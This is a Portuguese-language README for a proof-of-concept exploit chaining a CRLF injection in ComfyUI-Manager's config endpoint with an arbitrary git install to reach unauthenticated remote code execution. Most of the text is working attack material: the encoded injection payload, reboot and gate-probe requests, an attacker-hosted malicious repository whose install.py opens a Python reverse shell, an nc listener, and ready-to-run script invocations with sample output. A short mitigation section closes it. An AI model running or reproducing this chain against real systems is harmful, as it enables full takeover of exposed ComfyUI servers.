
Prova de conceito de exploit encadeando injeção CRLF no endpoint de configuração do ComfyUI-Manager com uma instalação git arbitrária para alcançar execução remota de código não autenticada.
Severidade: Crítica (CVSS 9.8) Afetado: ComfyUI-Manager < 3.39.2 e 4.0.0 - 4.0.4 Corrigido em: ComfyUI-Manager 3.39.2 / 4.0.5 Encadeado com: CVE-2025-67303 (Instalação Git Arbitrária -> Execução de Código)
O ComfyUI-Manager expõe um endpoint /api/manager/db_mode que aceita um parâmetro de consulta value e o grava diretamente em config.ini usando o configparser do Python.
A vulnerabilidade é uma injeção de carriage-return isolado (\r / %0D):
configparser serializa o valor literalmente — \r é armazenado como está no arquivo.\r isolado como terminador de linha, dividindo um valor em duas diretivas INI separadas.configparser com strict=False (padrão do ComfyUI-Manager) aceita chaves duplicadas e usa a última. O security_level = weak injetado sobrescreve o valor legítimo.Após um reboot, a configuração forjada entra em vigor, desativando a barreira de autenticação em /api/customnode/install/git_url (CVE-2025-67303). Esse endpoint clona um repositório git arbitrário e executa imediatamente o install.py dele como subprocesso — concedendo a um atacante não autenticado execução de código completa.
Step 1 — Inject bare CR into config endpoint
GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak
config.ini on disk after write:
db_mode = cache\r
security_level = weak <- injected via %0D
Step 2 — Reboot Manager to reload forged config
GET /api/manager/reboot
Manager reads config.ini back; universal newlines split the value;
last-key-wins -> security_level = weak
Step 3 — Verify gate (poll until 403 changes to 400)
POST /api/customnode/install/git_url body: http://127.0.0.1/probe.git
403 = gate still closed
400 = gate open, security_level=weak confirmed
Step 4 — Trigger install from evil git repo (CVE-2025-67303)
POST /api/customnode/install/git_url
body: http://ATTACKER:9099/alg-upscaler.git
Manager does:
git clone http://ATTACKER:9099/alg-upscaler.git
python install.py <- reverse shell executes here
| Arquivo | Propósito |
|---|---|
setup_evil_repo.sh | Constrói o repositório git malicioso e o serve via HTTP |
exploit_ad15.sh | Executa a cadeia completa: injeção CRLF -> reboot -> verificação -> disparo |
autopwn.py | Alternativa Python tudo-em-um (constrói o repositório + executa a cadeia completa) |
Passo 1 — Fingerprint de versão
curl -s http://TARGET:8188/api/manager/version
# Vulnerable: "3.39.1" / "4.0.3"
# Patched: "3.39.2" / "4.0.5"
Passo 2 — Confirmar que o endpoint CRLF aceita valores
curl -v "http://TARGET:8188/api/manager/db_mode?value=test" 2>&1 | grep "< HTTP"
# HTTP/1.1 200 -> endpoint exists and is writable
Passo 3 — Sondar a barreira de instalação
curl -s -o /dev/null -w "%{http_code}" \
-X POST http://TARGET:8188/api/customnode/install/git_url \
-d "http://127.0.0.1/probe.git"
# 403 -> gate closed (default config, target is injectable)
# 400 -> gate already open (skip Phase 1)
============================================================
CVE-2026-22777 + CVE-2025-67303 Full Chain
============================================================
Target : http://192.168.1.10:8188
Attacker : 10.10.14.1:4444
Evil repo : http://10.10.14.1:9099/alg-upscaler.git
[*] Phase 0: Version fingerprint
ComfyUI-Manager version: "3.39.1" <- vulnerable
[*] Phase 1: CRLF inject -> security_level = weak
[+] Injection sent (HTTP 200)
config.ini now contains:
db_mode = cache\r
security_level = weak <- injected via bare CR
[*] Phase 2: Trigger reboot
[+] Reboot request sent -- waiting 30s for Manager to restart...
[*] Phase 3: Verify security gate
Attempt 1: HTTP 403 <- still rebooting
Attempt 2: HTTP 403
Attempt 3: HTTP 400 <- gate open
[+] Gate OPEN -- security_level=weak is active
[*] Phase 4: Checking evil git repo is reachable
[+] Evil repo reachable (HTTP 200)
[*] Phase 5: Triggering git install (CVE-2025-67303)
ComfyUI-Manager will:
1. git clone http://10.10.14.1:9099/alg-upscaler.git
2. cd into cloned dir
3. python install.py <- reverse shell executes here
O curl na Fase 5 trava — o reverse shell chega em nc -lvnp 4444.
| PoC do Vulhub | Este PoC | |
|---|---|---|
install.py | touch /tmp/success (apenas prova de execução) | Reverse shell em Python de volta ao atacante |
| Resultado | Sem shell interativo | Shell interativo completo |
| PoC do Vulhub | Este PoC | |
|---|---|---|
| Linguagem | Arquivo Python único | Bash, 2 scripts separados |
| Limpeza | tempfile.TemporaryDirectory (excluído automaticamente com Ctrl+C) | Manual (permanece no disco) |
| Nome do repositório | Aleatório (ex.: evil-node-a1b2c3) | Fixo: alg-upscaler |
| PoC do Vulhub | Este PoC | |
|---|---|---|
| CVE-2026-22777 (injeção CRLF) | Não incluído | Em exploit_ad15.sh Fase 1 |
| Reboot + verificação da barreira | Não incluído | Aguarda 30s e então faz polling 403->400 |
| Disparo da instalação | curl manual | Automatizado na Fase 5 |
Passo 1 — Configurar repositório malicioso e listener (dois terminais)
# Terminal 1 — listener
nc -lvnp 4444
# Terminal 2 — build and serve evil repo
bash setup_evil_repo.sh 10.10.14.1 4444
Passo 2 — Executar a cadeia completa de exploit
# Terminal 3
bash exploit_ad15.sh 192.168.1.10 10.10.14.1 4444
O shell chega no Terminal 1 após a Fase 5.
Alternativa — Python tudo-em-um
# Blind command
python3 autopwn.py http://192.168.1.10:8188 --command "id"
# Reverse shell
python3 autopwn.py http://192.168.1.10:8188 --revshell --lhost 10.10.14.1 --lport 4444
Atualização (recomendada): ComfyUI-Manager 3.39.2 ou 4.0.5+.
O patch remove \r e \n antes de gravar qualquer parâmetro de consulta em config.ini.
Mitigações de rede (se a correção não for imediata):
8188 no firewall — o ComfyUI não foi projetado para exposição pública./api/manager/* e /api/customnode/*.config.ini somente leitura: chmod 444 config.ini.